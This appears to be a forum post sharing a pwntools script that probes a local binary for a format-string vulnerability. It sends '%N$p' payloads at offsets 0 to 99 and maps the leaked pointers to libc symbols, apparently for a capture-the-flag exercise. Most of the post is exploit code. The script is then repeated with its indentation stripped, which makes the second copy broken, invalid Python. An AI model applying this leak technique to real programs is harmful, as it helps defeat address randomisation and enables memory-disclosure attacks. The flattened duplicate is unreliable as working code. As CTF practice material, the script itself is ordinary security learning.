clubby789 · September 4, 2020 23:03
diff --git a/fuzz.py b/fuzz.py
 from pwn import *
 context.arch = "amd64" # Change as applicable
 e = ELF("./format") # Binary name
 p = process(e.path)
 l = p.libc    # Load libc, initialised with correct values
 rev = {value : key for (key, value) in l.sym.items()}
 # Flip sym:addr dict
 def exec_fmt(pl):
    p.sendline(pl)
    return p.clean()
 # Assumes process loops forever; you'll need to spawn a new process
 # in this loop if you only get a few leaks

 for x in range(0, 100):
    # Leak pointer at offset
    l = exec_fmt(f'%{x}$p').strip()
    try:
        l = int(l, 16)
        print(f"%{x}$p : {hex(l)} - {rev[l]}")
        # Print matching symbol if found
    except:
        pass
	from pwn import *
	context.arch = "amd64" # Change as applicable
	e = ELF("./format") # Binary name
	p = process(e.path)
	l = p.libc # Load libc, initialised with correct values
	rev = {value : key for (key, value) in l.sym.items()}
	# Flip sym:addr dict
	def exec_fmt(pl):
	p.sendline(pl)
	return p.clean()
	# Assumes process loops forever; you'll need to spawn a new process
	# in this loop if you only get a few leaks

	for x in range(0, 100):
	# Leak pointer at offset
	l = exec_fmt(f'%{x}$p').strip()
	try:
	l = int(l, 16)
	print(f"%{x}$p : {hex(l)} - {rev[l]}")
	# Print matching symbol if found
	except:
	pass